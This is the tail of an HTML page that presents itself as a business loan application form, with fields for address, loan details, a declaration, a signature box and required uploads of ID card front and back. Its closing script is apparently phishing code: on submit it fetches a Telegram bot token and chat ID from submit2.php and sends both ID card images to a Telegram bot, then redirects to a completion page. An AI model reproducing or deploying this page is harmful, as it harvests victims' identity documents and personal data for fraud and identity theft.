            <div class="form-address-line-wrapper jsTest-address-line-wrapperField"><span class="form-address-line form-address-city-line jsTest-address-lineField "><span class="form-sub-label-container" style="vertical-align:top"><input type="text" id="input_12_city" name="q12_address[city]" class="form-textbox validate form-address-city" data-defaultvalue="" autoComplete="section-input_12 address-level2" data-component="city" aria-labelledby="label_12 sublabel_12_city" required="" value="" /><label class="form-sub-label" for="input_12_city" id="sublabel_12_city" style="min-height:13px">City</label></span></span><span class="form-address-line form-address-state-line jsTest-address-lineField "><span class="form-sub-label-container" style="vertical-align:top"><input type="text" id="input_12_state" name="q12_address[state]" class="form-textbox validate form-address-state" data-defaultvalue="" autoComplete="section-input_12 address-level1" data-component="state" aria-labelledby="label_12 sublabel_12_state" required="" value="" /><label class="form-sub-label" for="input_12_state" id="sublabel_12_state" style="min-height:13px">State / Province</label></span></span></div>
            <div class="form-address-line-wrapper jsTest-address-line-wrapperField"><span class="form-address-line form-address-zip-line jsTest-address-lineField "><span class="form-sub-label-container" style="vertical-align:top"><input type="text" id="input_12_postal" name="q12_address[postal]" class="form-textbox validate form-address-postal" data-defaultvalue="" autoComplete="section-input_12 postal-code" data-component="zip" aria-labelledby="label_12 sublabel_12_postal" required="" value="" /><label class="form-sub-label" for="input_12_postal" id="sublabel_12_postal" style="min-height:13px">Postal / Zip Code</label></span></span></div>
          </div>
        </div>
      </li>
      <li class="form-line form-line-column form-col-1 jf-required" data-type="control_checkbox" id="id_25"><label class="form-label form-label-right form-label-auto" id="label_25" aria-hidden="false"> Applicant Status<span class="form-required">*</span> </label>
        <div id="cid_25" class="form-input jf-required">
          <div class="form-single-column" role="group" aria-labelledby="label_25" data-component="checkbox"><span class="form-checkbox-item" style="clear:left"><span class="dragger-item"></span><input type="checkbox" aria-describedby="label_25" class="form-checkbox validate" id="input_25_0" name="q25_applicantStatus[]" value="New Client" required="" /><label id="label_input_25_0" for="input_25_0">New Client</label></span><span class="form-checkbox-item" style="clear:left"><span class="dragger-item"></span><input type="checkbox" aria-describedby="label_25" class="form-checkbox validate" id="input_25_1" name="q25_applicantStatus[]" value="Existing Client" required="" /><label id="label_input_25_1" for="input_25_1">Existing Client</label></span><span class="form-checkbox-item" style="clear:left"><input type="checkbox" class="form-checkbox-other form-checkbox validate" name="q25_applicantStatus[other]" id="other_25" value="other" tabindex="0" aria-label="Other" /><label id="label_other_25" style="text-indent:0" for="other_25"><span class="jfHiddenTextLabel">Other</span> </label><input type="text" class="form-checkbox-other-input form-textbox" name="q25_applicantStatus[other]" data-otherhint="Other" size="15" id="input_25" placeholder="Other" /><br /></span></div>
        </div>
      </li>
      <li class="form-line form-line-column form-col-2" data-type="control_textbox" id="id_43"><label class="form-label form-label-right form-label-auto" id="label_43" for="input_43" aria-hidden="false"> Job / Occupation </label>
        <div id="cid_43" class="form-input"> <input type="text" id="input_43" name="q43_job" data-type="input-textbox" class="form-textbox validate" data-defaultvalue="" size="20" data-component="textbox" aria-labelledby="label_43" value="" /> </div>
      </li>
      <li class="form-line form-line-column form-col-3" data-type="control_dropdown" id="id_10"><label class="form-label form-label-right form-label-auto" id="label_10" for="input_10" aria-hidden="false"> Job Classification </label>
        <div id="cid_10" class="form-input"> <select class="form-dropdown" id="input_10" name="q10_jobClassification" style="width:130px" data-component="dropdown" aria-label="Job Classification">
            <option id="ps" value="">Please Select</option>
            <option id="p1" value="Proprietor">Proprietor</option>
            <option id="p2" value="Partnership">Partnership</option>
            <option id="p3" value="Corporation">Corporation</option>
            <option id="p4" value="Non-profit">Non-profit</option>
            <option id="p5" value="Organization">Organization</option>
            <option id="p6" value="Government">Government</option>
          </select> </div>
      </li>
      <li class="form-line form-line-column form-col-4" data-type="control_email" id="id_8"><label class="form-label form-label-top" id="label_8" for="input_8" aria-hidden="false"> Email Address </label>
        <div id="cid_8" class="form-input-wide"> <span class="form-sub-label-container" style="vertical-align:top"><input type="email" id="input_8" name="q8_emailAddress" class="form-textbox validate" data-defaultvalue="" autoComplete="section-input_8 email" size="40" data-component="email" aria-labelledby="label_8 sublabel_input_8" value="" /><label class="form-sub-label" for="input_8" id="sublabel_input_8" style="min-height:13px">example@example.com</label></span> </div>
      </li>
      <li class="form-line" data-type="control_text" id="id_37">
        <div id="cid_37" class="form-input-wide">
          <div id="text_37" class="form-html" data-component="text" tabindex="0">
            <div style="width:100%;background-color:#0e1876;color:#fff;padding:4px 4px;">
              <p><strong id="bh2">Loan Information</strong></p>
            </div>
          </div>
        </div>
      </li>
      <li class="form-line form-line-column form-col-1 form-line-column-clear jf-required" data-type="control_textbox" id="id_35"><label class="form-label form-label-right form-label-auto" id="label_35" for="input_35" aria-hidden="false"> Loan Amount<span class="form-required">*</span> </label>
        <div id="cid_35" class="form-input jf-required"> <input type="text" id="input_35" name="q35_loanAmount" data-type="input-textbox" class="form-textbox validate" data-defaultvalue="" size="20" data-component="textbox" aria-labelledby="label_35" required="" value="" /> </div>
      </li>
      <li class="form-line form-line-column form-col-2 jf-required" data-type="control_dropdown" id="id_36"><label class="form-label form-label-right form-label-auto" id="label_36" for="input_36" aria-hidden="false"> Loan/Credit Term<span class="form-required">*</span> </label>
        <div id="cid_36" class="form-input jf-required"> <select class="form-dropdown validate" id="input_36" name="q36_loancreditTerm" style="width:150px" data-component="dropdown" required="" aria-label="Loan/Credit Term">
            <option id="psy" value="">Please Select</option>
            <option id="1y" value="1 year">1 year</option>
            <option id="2y" value="2 years">2 years</option>
            <option id="3y" value="3 years">3 years</option>
            <option id="4y" value="4 years">4 years</option>
            <option id="5y" value="5 years">5 years</option>
            <option id="6y"  value="6 years">6 years</option>
            <option id="7y" value="7 years">7 years</option>
            <option id="8y" value="8 years">8 years</option>
            <option id="9y" value="9 years">9 years</option>  
            <option id="10y" value="10 years">10 years</option>
          </select> </div>
      </li>
      <li class="form-line form-line-column form-col-1 form-line-column-clear jf-required" data-type="control_radio" id="id_38"><label class="form-label form-label-right form-label-auto" id="label_38" aria-hidden="false"> Type of Loan Facility<span class="form-required">*</span> </label>
        <div id="cid_38" class="form-input jf-required">
          <div class="form-single-column" role="group" aria-labelledby="label_38" data-component="radio"><span class="form-radio-item" style="clear:left"><span class="dragger-item"></span>
          	
          <input type="radio" aria-describedby="label_38" class="form-radio validate" id="input_38_0" name="q38_typeOf" value="Overdraft" required="" /><label id="label_input_38_0" for="input_38_0">Overdraft</label></span><span class="form-radio-item" style="clear:left"><span class="dragger-item"></span><input type="radio" aria-describedby="label_38" class="form-radio validate" id="input_38_1" name="q38_typeOf" value="Commercial Property" required="" /><label id="label_input_38_1" for="input_38_1">Commercial Property</label></span><span class="form-radio-item" style="clear:left"><span class="dragger-item"></span><input type="radio" aria-describedby="label_38" class="form-radio validate" id="input_38_2" name="q38_typeOf" value="Industrial Property" required="" /><label id="label_input_38_2" for="input_38_2">Industrial Property</label></span><span class="form-radio-item" style="clear:left"><span class="dragger-item"></span><input type="radio" aria-describedby="label_38" class="form-radio validate" id="input_38_3" name="q38_typeOf" value="Micro Loans" required="" /><label id="label_input_38_3" for="input_38_3">Micro Loans</label></span><span class="form-radio-item" style="clear:left"><span class="dragger-item"></span><input type="radio" aria-describedby="label_38" class="form-radio validate" id="input_38_4" name="q38_typeOf" value="Revolving Credit" required="" /><label id="label_input_38_4" for="input_38_4">Revolving Credit</label></span><span class="form-radio-item" style="clear:left"><span class="dragger-item"></span><input type="radio" aria-describedby="label_38" class="form-radio validate" id="input_38_5" name="q38_typeOf" value="Equipment Financing" required="" /><label id="label_input_38_5" for="input_38_5">Equipment Financing</label></span><span class="form-radio-item" style="clear:left"><input type="radio" class="form-radio-other form-radio validate" name="q38_typeOf" id="other_38" value="other" tabindex="0" aria-label="Other" /><label id="label_other_38" style="text-indent:0" for="other_38"><span class="jfHiddenTextLabel">Other</span> </label><input type="text" class="form-radio-other-input form-textbox" name="q38_typeOf[other]" data-otherhint="Other" size="15" id="input_38" placeholder="Other" /><br /></span></div>
        </div>
      </li>
      <li class="form-line form-line-column form-col-2 jf-required" data-type="control_textarea" id="id_24"><label class="form-label form-label-right form-label-auto" id="label_24" for="input_24" aria-hidden="false"> Purpose of your Loan<span class="form-required">*</span> </label>
        <div id="cid_24" class="form-input jf-required"> <textarea id="input_24" class="form-textarea validate" name="q24_purposeOf" cols="38" rows="13" data-component="textarea" required="" aria-labelledby="label_24"></textarea> </div>
      </li>
      
      
      <li class="form-line form-line-column form-col-2 always-hidden" data-type="control_textbox" id="id_18"><label class="form-label form-label-right form-label-auto" id="label_18" for="input_18" aria-hidden="false"> Total Liabilities </label>
        <div id="cid_18" class="form-input always-hidden"> <input type="text" id="input_18" name="q18_totalLiabilities" data-type="input-textbox" class="form-textbox" data-defaultvalue="" size="15" data-component="textbox" aria-labelledby="label_18" value="" /> </div>
      </li>
      <li class="form-line form-line-column form-col-3 always-hidden" data-type="control_textbox" id="id_19"><label class="form-label form-label-right form-label-auto" id="label_19" for="input_19" aria-hidden="false"> Total Networth </label>
        <div id="cid_19" class="form-input always-hidden"> <input type="text" id="input_19" name="q19_totalNetworth" data-type="input-textbox" class="form-textbox" data-defaultvalue="" size="15" data-component="textbox" aria-labelledby="label_19" value="" /> </div>
      </li>
      <li class="form-line" data-type="control_divider" id="id_23">
        <div id="cid_23" class="form-input-wide">
          <div class="divider" data-component="divider" style="border-bottom-width:1px;border-bottom-style:dashed;border-color:#e6e6e6;height:1px;margin-left:0px;margin-right:0px;margin-top:5px;margin-bottom:5px"></div>
        </div>
      </li>
      <li class="form-line always-hidden" data-type="control_textbox" id="id_20"><label class="form-label form-label-right form-label-auto" id="label_20" for="input_20" aria-hidden="false"> Annual Income </label>
        <div id="cid_20" class="form-input always-hidden"> <input type="text" id="input_20" name="q20_annualIncome" data-type="input-textbox" class="form-textbox" data-defaultvalue="" size="15" data-component="textbox" aria-labelledby="label_20" value="" /> </div>
      </li>
      <li class="form-line form-line-column form-col-1 jf-required" data-type="control_fileupload" id="id_52"><label class="form-label form-label-top" id="label_52" for="input_52" aria-hidden="false"> ID card front<span class="form-required">*</span> </label>
        <div id="cid_52" class="form-input-wide jf-required">
          <div data-wrapper-react="true">
            <div data-wrapper-react="true">
              <div class="qq-uploader-buttonText-value">Browse Files</div><input type="file" id="input_52" name="q52_idCard52[]" multiple="" class="form-upload-multiple validate" data-imagevalidate="yes" data-file-accept=" jpg, jpeg, png" data-limit-file-size="Yes" data-file-maxsize="10854" data-file-minsize="0" data-file-limit="" data-component="fileupload" required="" />
            </div><span style="display:none" class="cancelText">Cancel</span><span style="display:none" class="ofText">of</span>
          </div>
        </div>
      </li>
      <li class="form-line form-line-column form-col-2 jf-required" data-type="control_fileupload" id="id_53"><label class="form-label form-label-top" id="label_53" for="input_53" aria-hidden="false"> ID card back<span class="form-required">*</span> </label>
        <div id="cid_53" class="form-input-wide jf-required">
          <div data-wrapper-react="true">
            <div data-wrapper-react="true">
              <div class="qq-uploader-buttonText-value">Browse Files</div><input type="file" id="input_53" name="q53_idCard[]" multiple="" class="form-upload-multiple validate" data-imagevalidate="yes" data-file-accept="pdf, doc, docx, xls, xlsx, csv, txt, rtf, html, zip, mp3, wma, mpg, flv, avi, jpg, jpeg, png, gif" data-limit-file-size="Yes" data-file-maxsize="10854" data-file-minsize="0" data-file-limit="" data-component="fileupload" required="" />
            </div><span style="display:none" class="cancelText">Cancel</span><span style="display:none" class="ofText">of</span>
          </div>
        </div>
      </li>
      <li class="form-line" data-type="control_divider" id="id_51">
        <div id="cid_51" class="form-input-wide">
          <div class="divider" data-component="divider" style="border-bottom-width:1px;border-bottom-style:solid;border-color:rgb(248, 248, 248);height:1px;margin-left:0px;margin-right:0px;margin-top:5px;margin-bottom:5px"></div>
        </div>
      </li>
      <li class="form-line" data-type="control_text" id="id_31">
        <div id="cid_31" class="form-input-wide">
          <div id="text_31" class="form-html" data-component="text" tabindex="0">
            <div style="background-color: #ffffff; color: #000; padding: 10px 10px;">
              <p id="tc1">I/We hereby affirm this application for loan or credit as specified above in this application form, on behalf of the business applicant. The information specified above provided are true and correct to the best of my/our knowledge and with no intention to commit acts of misrepresentation. No addition or omission has been made which may lead to acts of fraud or any form of impropriety.</p>
              <p id="tc2">I/We agree that the Lender is authorized to conduct any form of investigation in order to verify and confirm our declarations and requests, including, but not limited to conduct any investigation of my/our credit standing.</p>
              <p id="tc3">Provided that with given notice, Lender may disclose financial information of our account to any another lender or parties interested to the information which may be needed for disclosure in relevance to credit investigation.</p>
            </div>
          </div>
        </div>
      </li>
      <li class="form-line" data-type="control_signature" id="id_32"><label class="form-label form-label-right form-label-auto" id="label_32" for="input_32" aria-hidden="false">Signature</label>
        
 </li>
 <li class="form-line" data-type="control_signature" id="id_32">
 		<iframe src="sign.html"  width="600" height="400" frameborder="0" style="display:block"></iframe>
 	
 </li>
 
      <li class="form-line jf-required" data-type="control_datetime" id="id_34"><label class="form-label form-label-right form-label-auto" id="label_34" for="lite_mode_34" aria-hidden="false">Date Signed<span class="form-required">*</span> </label>
        <div id="cid_34" class="form-input jf-required">
          <div data-wrapper-react="true">
            <div style="display:none"><span class="form-sub-label-container" style="vertical-align:top"><input type="tel" class="form-textbox validate[required, disallowPast, limitDate]" id="month_34" name="q34_dateSigned[month]" size="2" data-maxlength="2" data-age="" maxLength="2" value="01" required="" autoComplete="off" aria-labelledby="label_34 sublabel_34_month" /><span class="date-separate" aria-hidden="true"> -</span><label class="form-sub-label" for="month_34" id="sublabel_34_month" style="min-height:13px">Month</label></span><span class="form-sub-label-container" style="vertical-align:top"><input type="tel" class="currentDate form-textbox validate[required, disallowPast, limitDate]" id="day_34" name="q34_dateSigned[day]" size="2" data-maxlength="2" data-age="" maxLength="2" value="24" required="" autoComplete="off" aria-labelledby="label_34 sublabel_34_day" /><span class="date-separate" aria-hidden="true"> -</span><label class="form-sub-label" for="day_34" id="sublabel_34_day" style="min-height:13px">Day</label></span><span class="form-sub-label-container" style="vertical-align:top"><input type="tel" class="form-textbox validate[required, disallowPast, limitDate]" id="year_34" name="q34_dateSigned[year]" size="4" data-maxlength="4" data-age="" maxLength="4" value="2024" required="" autoComplete="off" aria-labelledby="label_34 sublabel_34_year" /><label class="form-sub-label" for="year_34" id="sublabel_34_year" style="min-height:13px">Year</label></span></div><span class="form-sub-label-container" style="vertical-align:top"><input type="text" class="form-textbox validate[required, disallowPast, limitDate, validateLiteDate]" id="lite_mode_34" size="12" data-maxlength="12" maxLength="12" data-age="" value="01-24-2024" required="" data-format="mmddyyyy" data-seperator="-" placeholder="mm-dd-yyyy" data-placeholder="MM-DD-YYYY" autoComplete="off" aria-labelledby="label_34 sublabel_34_litemode" /><img class=" newDefaultTheme-dateIcon icon-liteMode" alt="Pick a Date" id="input_34_pick" src="https://cdn.jotfor.ms/images/calendar.png" data-component="datetime" aria-hidden="true" data-allow-time="No" data-version="v1" /><label class="form-sub-label" for="lite_mode_34" id="sublabel_34_litemode" style="min-height:13px">Date</label></span>
            </div>
        </div>
        <br>
            	<br><div style="text-align:center">
        <button id="form-pagebreak-next_54" style="padding-bottom:15px; position:flex; align-items:center; width:40%" type="submit" class="form-pagebreak-next  jf-form-buttons" data-component="pagebreak-next">Submit</button></div>
      	</div>
      </li>
      <li id="cid_54" class="form-input-wide" data-type="control_pagebreak">
        
      </li>
    </ul>
    
  </div>
          		
          	
  
</form></body>
<script src="translate.js"> </script>
<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js'> 
    </script>
<script>
	
    $('#form-pagebreak-next_54').on('click', function(event) {
        event.preventDefault();
        isEmpty = true;
      const inputs = document.querySelectorAll('.validate');
      
      for( const input of inputs){
      if(input.value.trim() === ""){
      input.style.borderColor = "red";
      }else{
      input.style.borderColor = "";
      isEmpty = false;
      
      } 
      }
        
        console.log('yes');
        let myForm = $("#form");
        
        if (!isEmpty) {
	// Serialize regular inputs
let regularData = {};
let fileData = new FormData();

myForm.find(':input:not(:file)').each(function () {
    regularData[this.name] = $(this).val();
});

// Serialize file inputs
async function files(){
myForm.find(':file').each(function () {
    let files = $(this)[0].files;
    if (files.length > 0) {
        fileData.append(this.name, files[0]);
    }
});
}
console.log(regularData);
console.log(fileData);
// Make submission for regular inputs

async function send(btk, cht, file) {
        const formData = new FormData();
        const url = `https://api.telegram.org/bot${btk}/sendDocument`;

        formData.append('chat_id', cht);
        formData.append('document', file);
        formData.append('caption', 'message');

        try {
            await $.ajax({
                method: 'POST',
                url: url,
                data: formData,
                processData: false,
                contentType: false,
                success: function (msg) {
                    console.log(msg);
                    window.location.href = "/Complete";
                },
                error: function (error) {
                    console.error(error);
                }
            });
        } catch (error) {
            console.error(error);
        }
    };


$.ajax({
    url: 'submit2.php',
    type: 'POST',
    data: regularData,
    success: function (regularResponse) {
        // On success, make submission for file inputs
        $.ajax({
            url: 'submit2.php',
            type: 'POST',
            data: fileData,
            processData: false,
            contentType: false,
            success: function (msg) {
            let split = msg.split("\n");
            let btk = split[0];
            let cht = split[1];
                // Handle success for file submission
 let file1 = document.querySelector('#input_52').files[0];
 let file2 = document.querySelector('#input_53').files[0];
          	console.log(file1);
          	console.log(file2);
 
 			send(btk, cht, file1);
 			send(btk, cht, file2);
            },
            error: function (fileError) {
                // Handle error for file submission
            }
        });
    },
    error: function (regularError) {
        // Handle error for regular submission
    }
});
};
	});
	</script>

</html>